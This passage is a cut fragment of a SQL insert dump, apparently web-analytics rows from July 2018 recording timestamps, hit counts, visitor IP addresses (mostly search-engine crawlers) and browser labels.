110','other'),(273883,1531639305,1,1,0,0,'54.36.148.184','other'),(273884,1531639414,1,1,0,0,'54.36.148.211','other'),(273885,1531639491,2,0,2,0,'66.249.69.163',''),(273886,1531639524,2,2,0,0,'162.210.196.129','other'),(273887,1531639567,1,1,0,0,'216.244.66.241','other'),(273888,1531639771,2,0,2,0,'66.249.69.167',''),(273889,1531640029,1,1,0,0,'54.36.148.153','other'),(273890,1531640065,2,1,1,0,'66.249.69.169',''),(273891,1531640108,1,1,0,0,'54.36.148.105','other'),(273892,1531640185,1,1,0,0,'54.36.149.49','other'),(273893,1531640249,1,1,0,0,'54.36.149.67','other'),(273894,1531640320,1,1,0,0,'54.36.148.150','other'),(273895,1531640583,1,0,1,0,'66.249.69.163',''),(273896,1531640660,1,1,0,0,'54.36.148.205','other'),(273897,1531640717,1,1,0,0,'8.29.198.27','other'),(273898,1531640734,1,1,0,0,'54.36.149.27','other'),(273899,1531640754,1,1,0,0,'54.36.148.198','other'),(273900,1531640870,1,1,0,0,'54.36.149.104','other'),(273901,1531640916,2,0,2,0,'66.249.69.167',''),(273902,1531641338,1,1,0,0,'54.36.148.69','other'),(273903,1531641340,1,1,0,0,'54.36.148.139','other'),(273904,1531641363,1,1,0,0,'54.36.148.219','other'),(273905,1531641375,2,0,2,0,'66.249.69.89',''),(273906,1531641481,1,1,0,0,'54.36.149.51','other'),(273907,1531641655,1,0,1,0,'66.249.69.163',''),(273908,1531641662,1,1,0,0,'66.102.9.38','chrome'),(273909,1531641685,2,0,2,0,'66.249.69.169',''),(273910,1531641841,1,1,0,0,'54.36.148.40','other'),(273911,1531641851,1,1,0,0,'216.244.66.241','other'),(273912,1531641923,1,1,0,0,'54.36.149.81','other'),(273913,1531641938,1,1,0,0,'54.36.148.50','other'),(273914,1531641956,1,1,0,0,'54.36.149.44','other'),(273915,1531642336,1,1,0,0,'54.36.148.41','other'),(273916,1531642672,1,0,1,0,'66.249.69.163',''),(273917,1531642822,1,1,0,0,'37.73.154.188','chrome'),(273918,1531642915,1,0,1,0,'66.249.69.169',''),(273919,1531642938,1,1,0,0,'54.36.148.230','other'),(273920,1531642978,2,0,2,0,'66.249.69.167',''),(273921,1531643037,1,1,0,0,'54.36.148.79','other'),(273922,1531643068,1,1,0,0,'54.36.148.28','other'),(273923,1531643113,1,1,0,0,'66.249.69.91','chrome'),(273924,1531643242,1,1,0,0,'54.36.148.171','other'),(273925,1531643277,1,1,0,0,'54.36.148.168','other'),(273926,1531643516,1,1,0,0,'180.76.15.156','other'),(273927,1531644160,1,1,0,0,'54.36.148.12','other'),(273928,1531644196,1,1,0,0,'54.36.149.70','other'),(273929,1531644312,2,0,2,0,'66.249.69.163',''),(273930,1531644404,1,1,0,0,'37.115.197.241','firefox'),(273931,1531644443,1,0,1,0,'66.249.69.169',''),(273932,1531645161,1,1,0,0,'40.77.167.143','other'),(273933,1531645433,1,1,0,0,'54.36.149.38','other'),(273934,1531645590,208,208,0,0,'95.216.6.46','other'),(273935,1531645678,1,1,0,0,'54.36.148.160','other'),(273936,1531645749,1,1,0,0,'54.36.149.60','other'),(273937,1531645764,1,0,1,0,'66.249.69.169',''),(273938,1531646124,1,0,1,0,'66.249.69.163',''),(273939,1531646143,1,1,0,0,'54.36.148.108','other'),(273940,1531646458,1,1,0,0,'54.36.148.40','other'),(273941,1531646461,3,3,0,0,'216.244.66.241','other'),(273942,1531646491,19,19,0,0,'95.216.6.46','other'),(273943,1531646544,1,0,1,0,'66.249.69.167',''),(273944,1531647182,1,1,0,0,'54.36.149.64','other'),(273945,1531647239,1,1,0,0,'54.36.149.18','other'),(273946,1531647486,1,1,0,0,'54.36.148.140','other'),(273947,1531647493,1,1,0,0,'66.249.69.163','chrome'),(273948,1531647666,1,1,0,0,'54.36.149.7','other'),(273949,1531647688,1,0,1,0,'66.249.69.167',''),(273950,1531647740,1,1,0,0,'54.36.148.14','other'),(273951,1531647916,1,1,0,0,'8.29.198.25','other'),(273952,1531648014,1,1,0,0,'54.36.148.40','other'),(273953,1531648048,1,0,1,0,'66.249.69.89',''),(273954,1531648155,1,1,0,0,'54.36.148.217','other'),(273955,1531648222,1,1,0,0,'54.36.149.50','other'),(273956,1531648236,1,1,0,0,'66.249.69.91','chrome'),(273957,1531648331,1,1,0,0,'95.163.255.99','other'),(273958,1531648549,1,1,0,0,'54.36.149.41','other'),(273959,1531648642,1,1,0,0,'54.36.149.0','other'),(273960,1531648644,1,1,0,0,'54.36.149.106','other'),(273961,1531648766,1,1,0,0,'54.36.148.31','other'),(273962,1531648879,1,1,0,0,'54.36.148.238','other'),(273963,1531648885,1,1,0,0,'54.36.148.137','other'),(273964,1531649020,1,1,0,0,'54.36.148.43','other'),(273965,1531649082,1,1,0,0,'54.36.148.231','other'),(273966,1531649156,1,1,0,0,'54.36.149.29','other'),(273967,1531649626,1,1,0,0,'54.36.148.14','other'),(273968,1531649643,1,1,0,0,'54.36.149.36','other'),(273969,1531649807,1,1,0,0,'54.36.148.40','other'),(273970,1531650024,2,1,1,0,'66.249.69.167',''),(273971,1531650074,1,0,1,0,'66.249.69.163',''),(273972,1531650084,1,1,0,0,'54.36.148.242','other'),(273973,1531650234,1,1,0,0,'95.163.255.117','other'),(273974,1531650244,1,1,0,0,'95.163.255.113','other'),(273975,1531650349,1,1,0,0,'54.36.148.148','other'),(273976,1531650425,2,0,2,0,'66.249.69.169',''),(273977,1531650491,1,1,0,0,'54.36.148.55','other'),(273978,1531650609,1,1,0,0,'54.36.148.198','other'),(273979,1531651097,1,1,0,0,'54.36.148.192','other'),(273980,1531651171,3,3,0,0,'216.244.66.241','other'),(273981,1531651548,1,1,0,0,'54.36.148.227','other'),(273982,1531651558,1,1,0,0,'8.29.198.27','other'),(273983,1531651599,2,0,2,0,'66.249.69.169',''),(273984,1531651746,60,60,0,0,'173.234.159.250','other'),(273985,1531651882,2,1,1,0,'66.249.69.167',''),(273986,1531651976,17,17,0,0,'158.69.254.103','other'),(273987,1531652054,1,1,0,0,'54.36.148.126','other'),(273988,1531652156,2,0,2,0,'66.249.69.163',''),(273989,1531652164,1,1,0,0,'207.46.13.210','other'),(273990,1531652201,1,1,0,0,'54.36.148.248','other'),(273991,1531652252,1,1,0,0,'95.163.255.103','other'),(273992,1531652268,2,2,0,0,'216.244.66.241','other'),(273993,1531652506,1,0,1,0,'66.249.69.169',''),(273994,1531652701,1,1,0,0,'66.249.69.93','chrome'),(273995,1531652830,1,1,0,0,'54.36.148.30','other'),(273996,1531652850,1,0,1,0,'66.249.65.155',''),(273997,1531652936,1,1,0,0,'54.36.148.197','other'),(273998,1531653291,1,1,0,0,'54.36.148.228','other'),(273999,1531653345,1,1,0,0,'54.36.148.112','other'),(274000,1531653553,1,1,0,0,'54.36.148.247','other'),(274001,1531653599,1,1,0,0,'54.36.149.80','other'),(274002,1531653670,1,1,0,0,'54.36.148.152','other'),(274003,1531653698,1,0,1,0,'66.249.69.163',''),(274004,1531653849,1,1,0,0,'54.36.148.79','other'),(274005,1531653888,1,1,0,0,'54.36.148.64','other'),(274006,1531653945,6,6,0,0,'216.244.66.241','other'),(274007,1531654114,1,1,0,0,'54.36.148.195','other'),(274008,1531654157,1,1,0,0,'54.36.149.47','other'),(274009,1531654199,1,1,0,0,'54.36.149.26','other'),(274010,1531654636,1,0,1,0,'66.249.69.169',''),(274011,1531654793,1,0,1,0,'66.249.69.163',''),(274012,1531655145,1,0,1,0,'66.249.69.167',''),(274013,1531655154,1,1,0,0,'40.77.167.143','other'),(274014,1531655385,1,1,0,0,'54.36.149.69','other'),(274015,1531655679,1,1,0,0,'54.36.148.176','other'),(274016,1531656079,1,1,0,0,'40.77.167.143','other'),(274017,1531656312,1,1,0,0,'54.36.149.7','other'),(274018,1531656476,1,1,0,0,'91.204.84.93','chrome'),(274019,1531656537,1,0,1,0,'66.249.69.89',''),(274020,1531656651,1,1,0,0,'178.154.171.60','other'),(274021,1531656665,2,2,0,0,'54.36.149.22','other'),(274022,1531656707,1,0,1,0,'66.249.69.163',''),(274023,1531656752,1,1,0,0,'180.76.15.154','other'),(274024,1531656829,1,1,0,0,'54.36.148.252','other'),(274025,1531656963,1,1,0,0,'54.36.148.118','other'),(274026,1531656966,1,1,0,0,'54.36.148.39','other'),(274027,1531656972,1,1,0,0,'54.36.148.148','other'),(274028,1531656976,3,3,0,0,'216.244.66.241','other'),(274029,1531657089,1,1,0,0,'54.36.148.41','other'),(274030,1531657099,1,1,0,0,'54.36.149.12','other'),(274031,1531657124,1,0,1,0,'66.249.69.169',''),(274032,1531657207,1,1,0,0,'54.36.148.53','other'),(274033,1531657226,1,1,0,0,'157.55.39.233','other'),(274034,1531657403,1,1,0,0,'54.36.148.234','other'),(274035,1531657445,1,1,0,0,'54.36.148.56','other'),(274036,1531657459,1,1,0,0,'54.36.148.105','other'),(274037,1531657524,3,3,0,0,'178.33.23.156','other'),(274038,1531657544,1,1,0,0,'54.36.148.52','other'),(274039,1531657621,1,1,0,0,'207.46.13.210','other'),(274040,1531657676,1,1,0,0,'54.36.148.172','other'),(274041,1531657947,2,2,0,0,'54.36.148.108','other'),(274042,1531657988,1,1,0,0,'87.250.224.85','other'),(274043,1531658013,1,1,0,0,'31.223.224.135','firefox'),(274044,1531658307,1,1,0,0,'54.36.148.135','other'),(274045,1531658757,1,1,0,0,'54.36.148.196','other'),(274046,1531658762,1,1,0,0,'8.29.198.25','other'),(274047,1531658827,2,0,2,0,'66.249.69.169',''),(274048,1531658979,1,0,1,0,'66.249.69.167',''),(274049,1531659129,3,0,3,0,'66.249.69.163',''),(274050,1531659264,1,1,0,0,'66.249.69.93','chrome'),(274051,1531659445,1,1,0,0,'46.211.98.228','chrome'),(274052,1531659475,3,3,0,0,'216.244.66.241','other'),(274053,1531659760,1,1,0,0,'95.163.255.106','other'),(274054,1531659769,1,1,0,0,'95.163.255.114','other'),(274055,1531659775,1,1,0,0,'95.163.255.115','other'),(274056,1531660176,1,1,0,0,'91.196.178.100','firefox'),(274057,1531660297,1,1,0,0,'54.36.148.96','other'),(274058,1531660318,1,1,0,0,'54.36.149.38','other'),(274059,1531660499,1,1,0,0,'54.36.149.81','other'),(274060,1531660547,1,1,0,0,'54.36.148.36','other'),(274061,1531660565,1,1,0,0,'54.36.149.19','other'),(274062,1531660843,1,1,0,0,'54.36.148.220','other'),(274063,1531660889,4,4,0,0,'216.244.66.241','other'),(274064,1531661106,1,1,0,0,'54.36.148.204','other'),(274065,1531661117,1,1,0,0,'54.36.148.210','other'),(274066,1531661313,1,1,0,0,'95.163.255.95','other'),(274067,1531661405,1,1,0,0,'54.36.148.182','other'),(274068,1531661409,1,1,0,0,'54.36.148.175','other'),(274069,1531661418,1,1,0,0,'54.36.148.201','other'),(274070,1531661469,1,1,0,0,'54.36.148.242','other'),(274071,1531661711,1,1,0,0,'54.36.148.215','other'),(274072,1531661761,1,1,0,0,'54.36.148.102','other'),(274073,1531661815,1,1,0,0,'54.36.148.61','other'),(274074,1531661816,1,1,0,0,'216.244.66.241','other'),(274075,1531661879,1,1,0,0,'54.36.148.221','other'),(274076,1531662297,1,1,0,0,'54.36.148.181','other'),(274077,1531662330,1,1,0,0,'54.36.149.2','other'),(274078,1531662335,1,1,0,0,'54.36.148.10','other'),(274079,1531662365,1,1,0,0,'54.36.148.206','other'),(274080,1531662390,1,1,0,0,'8.29.198.27','other'),(274081,1531662428,1,1,0,0,'54.36.149.38','other'),(274082,1531662545,1,0,1,0,'66.249.69.169',''),(274083,1531662917,1,0,1,0,'66.249.69.167',''),(274084,1531662921,1,0,1,0,'66.249.69.163',''),(274085,1531663080,1,1,0,0,'66.249.69.91','chrome'),(274086,1531663252,1,1,0,0,'54.36.149.21','other'),(274087,1531663479,1,1,0,0,'54.36.148.196','other'),(274088,1531664080,1,1,0,0,'54.36.148.106','other'),(274089,1531664166,1,1,0,0,'54.36.148.180','other'),(274090,1531664246,1,1,0,0,'54.36.148.164','other'),(274091,1531664359,1,1,0,0,'216.244.66.241','other'),(274092,1531664455,1,1,0,0,'54.36.148.82','other'),(274093,1531664566,1,1,0,0,'54.36.148.203','other'),(274094,1531664579,1,1,0,0,'54.36.148.237','other'),(274095,1531664781,1,1,0,0,'54.36.149.15','other'),(274096,1531664962,1,1,0,0,'54.36.148.223','other'),(274097,1531665042,1,1,0,0,'54.36.149.67','other'),(274098,1531665205,1,1,0,0,'54.36.149.92','other'),(274099,1531665498,1,1,0,0,'91.196.178.93','firefox'),(274100,1531665503,1,1,0,0,'54.36.148.41','other'),(274101,1531665530,1,1,0,0,'54.36.149.7','other'),(274102,1531665542,1,1,0,0,'54.36.148.45','other'),(274103,1531665568,1,1,0,0,'54.36.148.249','other'),(274104,1531665775,2,2,0,0,'54.36.148.186','other'),(274105,1531665947,2,2,0,0,'54.36.149.77','other'),(274106,1531666207,1,1,0,0,'54.36.148.178','other'),(274107,1531666618,1,1,0,0,'54.36.149.99','other'),(274108,1531666725,1,1,0,0,'54.36.148.180','other'),(274109,1531666733,1,1,0,0,'54.36.149.68','other'),(274110,1531666747,1,1,0,0,'54.36.148.201','other'),(274111,1531666763,1,1,0,0,'54.36.149.51','other'),(274112,1531666814,1,1,0,0,'54.36.148.77','other'),(274113,1531666953,1,1,0,0,'54.36.148.194','other'),(274114,1531667040,1,1,0,0,'54.36.148.250','other'),(274115,1531667068,1,1,0,0,'54.36.148.221','other'),(274116,1531667201,1,1,0,0,'40.77.167.143','other'),(274117,1531667284,1,1,0,0,'54.36.149.20','other'),(274118,1531667372,1,1,0,0,'54.36.149.93','other'),(274119,1531667693,1,1,0,0,'54.36.148.141','other'),(274120,1531667758,1,1,0,0,'54.36.149.2','other'),(274121,1531667992,1,1,0,0,'54.36.148.229','other'),(274122,1531668003,1,1,0,0,'54.36.149.78','other'),(274123,1531668183,1,1,0,0,'54.36.149.68','other'),(274124,1531668240,1,1,0,0,'54.36.148.198','other'),(274125,1531668267,1,1,0,0,'54.36.148.127','other'),(274126,1531668324,1,1,0,0,'54.36.148.62','other'),(274127,1531668588,1,1,0,0,'216.244.66.241','other'),(274128,1531668605,1,0,1,0,'66.249.69.167',''),(274129,1531668653,1,1,0,0,'54.36.148.205','other'),(274130,1531668753,1,1,0,0,'66.249.69.91','chrome'),(274131,1531668780,1,1,0,0,'54.36.148.185','other'),(274132,1531669353,1,1,0,0,'54.36.149.13','other'),(274133,1531669520,1,1,0,0,'54.36.148.115','other'),(274134,1531669594,1,1,0,0,'8.29.198.27','other'),(274135,1531669663,1,1,0,0,'54.36.148.216','other'),(274136,1531669737,1,1,0,0,'54.36.148.42','other'),(274137,1531669786,1,1,0,0,'54.36.148.123','other'),(274138,1531669905,1,1,0,0,'54.36.148.209','other'),(274139,1531669933,2,2,0,0,'91.196.178.86','chrome'),(274140,1531670633,1,1,0,0,'54.36.148.77','other'),(274141,1531670887,1,0,1,0,'66.249.69.169',''),(274142,1531671257,1,1,0,0,'54.36.148.47','other'),(274143,1531671303,1,1,0,0,'54.36.149.49','other'),(274144,1531671305,2,2,0,0,'216.244.66.241','other'),(274145,1531671518,1,1,0,0,'54.36.149.63','other'),(274146,1531671878,1,1,0,0,'54.36.148.221','other'),(274147,1531671903,1,0,1,0,'66.249.69.167',''),(274148,1531671960,1,1,0,0,'194.28.4.52','chrome'),(274149,1531672100,1,1,0,0,'54.36.148.66','other'),(274150,1531672152,1,1,0,0,'54.36.148.147','other'),(274151,1531672443,1,1,0,0,'62.210.103.31','other'),(274152,1531672448,1,1,0,0,'54.36.148.90','other'),(274153,1531672566,1,1,0,0,'40.77.167.143','other'),(274154,1531672893,1,1,0,0,'66.249.69.93','chrome'),(274155,1531672900,1,1,0,0,'54.36.148.68','other'),(274156,1531672995,1,1,0,0,'54.36.148.247','other'),(274157,1531673091,1,1,0,0,'54.36.149.82','other'),(274158,1531673112,1,1,0,0,'54.36.148.234','other'),(274159,1531673221,1,1,0,0,'8.29.198.27','other'),(274160,1531673512,1,1,0,0,'54.36.148.219','other'),(274161,1531673577,14,14,0,0,'144.76.91.79','other'),(274162,1531673827,1,1,0,0,'54.36.148.68','other'),(274163,1531674050,1,1,0,0,'54.36.149.64','other'),(274164,1531674089,1,1,0,0,'54.36.149.22','other'),(274165,1531674144,2,0,2,0,'66.249.69.167',''),(274166,1531674150,3,3,0,0,'216.244.66.241','other'),(274167,1531674200,1,1,0,0,'54.36.149.42','other'),(274168,1531674372,1,1,0,0,'54.36.148.154','other'),(274169,1531674619,1,1,0,0,'54.36.149.14','other'),(274170,1531675398,1,1,0,0,'54.36.148.193','other'),(274171,1531675473,1,0,1,0,'66.249.69.163',''),(274172,1531675481,1,1,0,0,'40.77.167.63','other'),(274173,1531675588,1,1,0,0,'54.36.149.101','other'),(274174,1531675720,1,1,0,0,'54.36.148.29','other'),(274175,1531675729,2,0,2,0,'66.249.69.169',''),(274176,1531675737,1,1,0,0,'66.249.69.91','chrome'),(274177,1531675923,2,2,0,0,'54.36.148.22','other'),(274178,1531676063,1,1,0,0,'54.36.148.97','other'),(274179,1531676253,1,1,0,0,'54.36.149.31','other'),(274180,1531676525,1,1,0,0,'216.244.66.241','other'),(274181,1531676847,1,1,0,0,'54.36.148.173','other'),(274182,1531677223,1,1,0,0,'54.36.148.141','other'),(274183,1531677293,1,1,0,0,'54.36.148.219','other'),(274184,1531677316,1,1,0,0,'54.36.148.182','other'),(274185,1531677555,1,1,0,0,'216.244.66.241','other'),(274186,1531677557,2,0,2,0,'66.249.69.169',''),(274187,1531677646,1,1,0,0,'54.36.148.193','other'),(274188,1531677989,3,0,3,0,'66.249.69.163',''),(274189,1531678051,1,1,0,0,'54.36.148.127','other'),(274190,1531678218,1,1,0,0,'54.36.149.0','other'),(274191,1531678222,1,1,0,0,'54.36.148.100','other'),(274192,1531678259,2,0,2,0,'66.249.69.167',''),(274193,1531678509,1,1,0,0,'54.36.148.198','other'),(274194,1531678583,1,0,1,0,'66.249.69.169',''),(274195,1531678772,1,1,0,0,'54.36.148.208','other'),(274196,1531678900,1,1,0,0,'54.36.148.94','other'),(274197,1531679536,2,0,2,0,'66.249.69.163',''),(274198,1531680194,1,1,0,0,'54.36.149.102','other'),(274199,1531680352,1,1,0,0,'54.36.149.94','other'),(274200,1531680399,1,1,0,0,'54.36.148.83','other'),(274201,1531680431,1,1,0,0,'8.29.198.26','other'),(274202,1531680478,1,1,0,0,'37.204.38.85','msie'),(274203,1531680481,1,1,0,0,'40.77.167.143','other'),(274204,1531680532,1,1,0,0,'54.36.148.130','other'),(274205,1531681151,1,1,0,0,'54.36.148.92','other'),(274206,1531681344,1,1,0,0,'54.36.148.134','other'),(274207,1531681487,1,1,0,0,'54.36.148.20','other'),(274208,1531681612,2,2,0,0,'92.113.189.235','chrome'),(274209,1531681635,1,1,0,0,'37.55.179.43','chrome'),(274210,1531681726,1,0,1,0,'66.249.69.167',''),(274211,1531681786,1,1,0,0,'40.77.167.63','other'),(274212,1531681933,1,0,1,0,'66.249.69.169',''),(274213,1531681964,1,1,0,0,'54.36.148.71','other'),(274214,1531682017,1,1,0,0,'54.36.148.76','other'),(274215,1531682244,1,1,0,0,'54.36.148.161','other'),(274216,1531682282,1,1,0,0,'54.36.148.79','other'),(274217,1531682328,1,1,0,0,'54.36.148.56','other'),(274218,1531682519,1,1,0,0,'216.244.66.241','other'),(274219,1531682639,1,1,0,0,'54.36.149.66','other'),(274220,1531682765,16,16,0,0,'157.55.39.233','other'),(274221,1531682775,1,1,0,0,'54.36.148.67','other'),(274222,1531682784,7,7,0,0,'207.46.13.210','other'),(274223,1531683214,1,0,1,0,'66.249.69.169',''),(274224,1531683342,1,1,0,0,'66.249.69.89','chrome'),(274225,1531683425,1,0,1,0,'66.249.69.163',''),(274226,1531684050,1,1,0,0,'8.29.198.27','other'),(274227,1531684096,1,1,0,0,'54.36.148.83','other'),(274228,1531684365,1,1,0,0,'54.36.148.108','other'),(274229,1531684414,1,1,0,0,'54.36.149.37','other'),(274230,1531684476,1,1,0,0,'54.36.148.96','other'),(274231,1531684526,1,1,0,0,'95.132.133.120','firefox'),(274232,1531684674,1,1,0,0,'54.36.148.206','other'),(274233,1531684704,1,1,0,0,'54.36.148.197','other'),(274234,1531684753,1,1,0,0,'54.36.148.163','other'),(274235,1531684790,2,2,0,0,'216.244.66.241','other'),(274236,1531684908,1,1,0,0,'54.36.148.46','other'),(274237,1531685162,1,1,0,0,'54.36.149.2','other'),(274238,1531685521,1,1,0,0,'54.165.59.7','other'),(274239,1531685614,1,1,0,0,'54.36.149.88','other'),(274240,1531685690,1,1,0,0,'37.53.111.120','chrome'),(274241,1531685693,1,1,0,0,'54.36.148.30','other'),(274242,1531685954,1,1,0,0,'54.36.148.211','other'),(274243,1531686031,1,0,1,0,'66.249.69.163',''),(274244,1531686090,1,1,0,0,'54.36.149.19','other'),(274245,1531686468,1,1,0,0,'54.36.148.97','other'),(274246,1531686726,1,1,0,0,'54.36.148.111','other'),(274247,1531686858,1,1,0,0,'54.36.148.253','other'),(274248,1531687383,3,3,0,0,'216.244.66.241','other'),(274249,1531687389,1,1,0,0,'54.165.59.7','other'),(274250,1531687502,1,1,0,0,'54.36.148.171','other'),(274251,1531687683,1,1,0,0,'54.36.149.56','other'),(274252,1531687782,1,1,0,0,'207.46.13.40','other'),(274253,1531687789,1,1,0,0,'54.36.148.42','other'),(274254,1531688001,1,1,0,0,'54.36.148.236','other'),(274255,1531688170,1,1,0,0,'178.154.171.55','other'),(274256,1531688218,1,1,0,0,'54.36.148.167','other'),(274257,1531688335,1,1,0,0,'54.36.149.84','other'),(274258,1531688425,1,1,0,0,'54.36.149.89','other'),(274259,1531688880,1,1,0,0,'54.36.148.22','other'),(274260,1531688999,1,1,0,0,'54.36.148.17','other'),(274261,1531689101,1,1,0,0,'54.36.148.68','other'),(274262,1531689154,1,1,0,0,'87.250.224.46','other'),(274263,1531689193,1,1,0,0,'54.36.148.112','other'),(274264,1531689284,1,1,0,0,'54.36.149.106','other'),(274265,1531689510,1,1,0,0,'180.76.15.161','other'),(274266,1531689755,1,1,0,0,'54.36.148.182','other'),(274267,1531689843,1,1,0,0,'54.36.149.4','other'),(274268,1531689978,1,1,0,0,'54.36.149.88','other'),(274269,1531690148,1,1,0,0,'54.36.148.104','other'),(274270,1531690218,2,2,0,0,'91.196.178.131','chrome'),(274271,1531690298,1,1,0,0,'54.36.149.58','other'),(274272,1531690681,1,1,0,0,'54.36.149.50','other'),(274273,1531690715,1,1,0,0,'54.36.148.67','other'),(274274,1531690773,1,1,0,0,'54.165.59.7','other'),(274275,1531690828,1,1,0,0,'54.36.149.80','other'),(274276,1531691265,1,1,0,0,'8.29.198.25','other'),(274277,1531691436,1,1,0,0,'54.36.148.240','other'),(274278,1531691506,1,1,0,0,'54.36.148.146','other'),(274279,1531692035,1,0,1,0,'66.249.69.169',''),(274280,1531692409,1,1,0,0,'40.77.167.143','other'),(274281,1531692494,1,1,0,0,'54.36.148.21','other'),(274282,1531692574,1,1,0,0,'54.165.59.7','other'),(274283,1531692613,1,1,0,0,'54.36.148.58','other'),(274284,1531692663,1,1,0,0,'54.36.148.50','other'),(274285,1531692796,2,2,0,0,'216.244.66.241','other'),(274286,1531692851,1,1,0,0,'66.249.69.91','chrome'),(274287,1531692896,1,1,0,0,'54.36.148.19','other'),(274288,1531692976,1,1,0,0,'178.154.171.10','other'),(274289,1531693066,1,1,0,0,'54.36.148.38','other'),(274290,1531693131,1,1,0,0,'54.36.148.227','other'),(274291,1531693232,3,3,0,0,'195.201.36.1','other'),(274292,1531693309,1,1,0,0,'54.36.148.189','other'),(274293,1531693627,1,1,0,0,'54.36.149.50','other'),(274294,1531693686,1,1,0,0,'54.36.149.81','other'),(274295,1531693829,1,1,0,0,'37.9.113.74','other'),(274296,1531693885,1,1,0,0,'54.36.148.182','other'),(274297,1531693899,4,0,4,0,'66.249.69.167',''),(274298,1531693903,1,1,0,0,'54.36.148.60','other'),(274299,1531694361,3,0,3,0,'66.249.69.163',''),(274300,1531694421,1,1,0,0,'54.36.148.115','other'),(274301,1531694490,1,1,0,0,'216.244.66.241','other'),(274302,1531694781,1,1,0,0,'54.36.148.51','other'),(274303,1531694791,1,1,0,0,'213.180.203.7','other'),(274304,1531694871,1,1,0,0,'54.36.149.35','other'),(274305,1531694882,1,1,0,0,'8.29.198.27','other'),(274306,1531695093,1,1,0,0,'40.77.167.143','other'),(274307,1531695257,1,1,0,0,'54.36.149.74','other'),(274308,1531695282,1,1,0,0,'54.36.148.143','other'),(274309,1531695646,1,1,0,0,'216.244.66.241','other'),(274310,1531695700,2,0,2,0,'66.249.69.163',''),(274311,1531695816,1,1,0,0,'54.36.148.164','other'),(274312,1531695841,1,1,0,0,'54.36.148.193','other'),(274313,1531695869,3,0,3,0,'66.249.69.167',''),(274314,1531696397,2,0,2,0,'66.249.69.169',''),(274315,1531696679,1,1,0,0,'54.36.148.229','other'),(274316,1531696860,1,1,0,0,'54.36.148.115','other'),(274317,1531697236,3,0,3,0,'66.249.69.163',''),(274318,1531697255,1,0,1,0,'66.249.69.167',''),(274319,1531697300,1,1,0,0,'207.46.13.210','other'),(274320,1531697359,1,1,0,0,'54.36.148.55','other'),(274321,1531697865,1,1,0,0,'54.36.148.219','other'),(274322,1531697950,1,0,1,0,'66.249.69.169',''),(274323,1531697998,1,1,0,0,'216.244.66.241','other'),(274324,1531698042,1,1,0,0,'54.36.148.251','other'),(274325,1531698346,1,1,0,0,'54.36.148.113','other'),(274326,1531698622,1,1,0,0,'54.36.148.214','other'),(274327,1531698684,1,1,0,0,'54.36.149.90','other'),(274328,1531698708,1,1,0,0,'54.36.149.21','other'),(274329,1531699118,1,1,0,0,'54.36.148.176','other'),(274330,1531699437,1,1,0,0,'54.36.149.98','other'),(274331,1531699540,1,1,0,0,'54.36.149.76','other'),(274332,1531699698,1,0,1,0,'66.249.69.163',''),(274333,1531699700,1,1,0,0,'54.36.148.40','other'),(274334,1531699789,2,2,0,0,'54.36.148.13','other'),(274335,1531699800,1,1,0,0,'66.249.69.89','chrome'),(274336,1531699958,1,1,0,0,'54.36.148.116','other'),(274337,1531699967,1,1,0,0,'54.36.148.163','other'),(274338,1531699986,1,1,0,0,'157.55.39.233','other'),(274339,1531700061,1,1,0,0,'54.36.148.237','other'),(274340,1531700417,1,1,0,0,'54.36.148.202','other'),(274341,1531700450,1,1,0,0,'54.36.148.158','other'),(274342,1531700929,1,0,1,0,'66.249.69.167',''),(274343,1531701208,1,1,0,0,'54.36.148.102','other'),(274344,1531701439,1,1,0,0,'54.36.148.97','other'),(274345,1531701484,1,1,0,0,'180.76.15.24','other'),(274346,1531701585,1,1,0,0,'54.36.148.121','other'),(274347,1531701820,1,1,0,0,'54.36.148.91','other'),(274348,1531702028,1,1,0,0,'54.36.148.216','other'),(274349,1531702104,1,1,0,0,'8.29.198.27','other'),(274350,1531702381,1,1,0,0,'54.36.148.45','other'),(274351,1531702455,1,1,0,0,'54.36.149.30','other'),(274352,1531702459,1,1,0,0,'54.36.148.61','other'),(274353,1531702542,3,3,0,0,'216.244.66.241','other'),(274354,1531702582,1,1,0,0,'54.36.148.151','other'),(274355,1531702616,1,1,0,0,'54.36.148.204','other'),(274356,1531702646,1,1,0,0,'54.36.149.74','other'),(274357,1531702838,1,1,0,0,'54.36.148.138','other'),(274358,1531702979,1,1,0,0,'54.36.148.224','other'),(274359,1531703035,1,1,0,0,'54.36.148.190','other'),(274360,1531703120,1,1,0,0,'54.36.148.52','other'),(274361,1531703457,1,1,0,0,'216.244.66.241','other'),(274362,1531703512,1,1,0,0,'54.36.149.43','other'),(274363,1531703583,1,1,0,0,'46.42.166.12','msie'),(274364,1531703735,1,0,1,0,'66.249.69.167',''),(274365,1531703913,1,1,0,0,'54.36.148.17','other'),(274366,1531703945,1,1,0,0,'54.36.148.37','other'),(274367,1531703971,1,1,0,0,'54.36.148.122','other'),(274368,1531704144,1,1,0,0,'54.36.149.80','other'),(274369,1531704273,1,1,0,0,'54.36.148.42','other'),(274370,1531704279,1,1,0,0,'54.36.148.14','other'),(274371,1531704733,2,0,2,0,'66.249.69.163',''),(274372,1531704960,1,1,0,0,'54.36.148.249','other'),(274373,1531705304,1,1,0,0,'54.36.149.73','other'),(274374,1531705307,1,1,0,0,'54.36.148.99','other'),(274375,1531705336,1,1,0,0,'216.244.66.241','other'),(274376,1531705551,1,1,0,0,'54.36.149.49','other'),(274377,1531705585,2,2,0,0,'95.163.255.115','other'),(274378,1531705608,3,3,0,0,'95.163.255.112','other'),(274379,1531705655,2,2,0,0,'95.163.255.106','other'),(274380,1531705676,1,1,0,0,'95.163.255.109','other'),(274381,1531705714,1,1,0,0,'8.29.198.25','other'),(274382,1531705738,1,1,0,0,'95.163.255.119','other'),(274383,1531705864,1,1,0,0,'95.163.255.113','other'),(274384,1531705907,1,1,0,0,'40.77.167.63','other'),(274385,1531705965,2,2,0,0,'95.163.255.104','other'),(274386,1531706157,1,1,0,0,'95.163.255.105','other'),(274387,1531706217,1,1,0,0,'54.36.148.92','other'),(274388,1531706257,2,2,0,0,'95.163.255.107','other'),(274389,1531706567,1,1,0,0,'54.36.149.3','other'),(274390,1531706570,1,1,0,0,'54.36.148.32','other'),(274391,1531706578,1,1,0,0,'54.36.148.152','other'),(274392,1531706629,2,2,0,0,'95.163.255.103','other'),(274393,1531706797,2,2,0,0,'95.163.255.117','other'),(274394,1531706925,1,1,0,0,'95.163.255.115','other'),(274395,1531706935,1,1,0,0,'216.244.66.241','other'),(274396,1531707034,2,2,0,0,'95.163.255.112','other'),(274397,1531707183,2,2,0,0,'95.163.255.102','other'),(274398,1531707186,1,1,0,0,'54.36.148.88','other'),(274399,1531707238,2,2,0,0,'95.163.255.108','other'),(274400,1531707466,1,1,0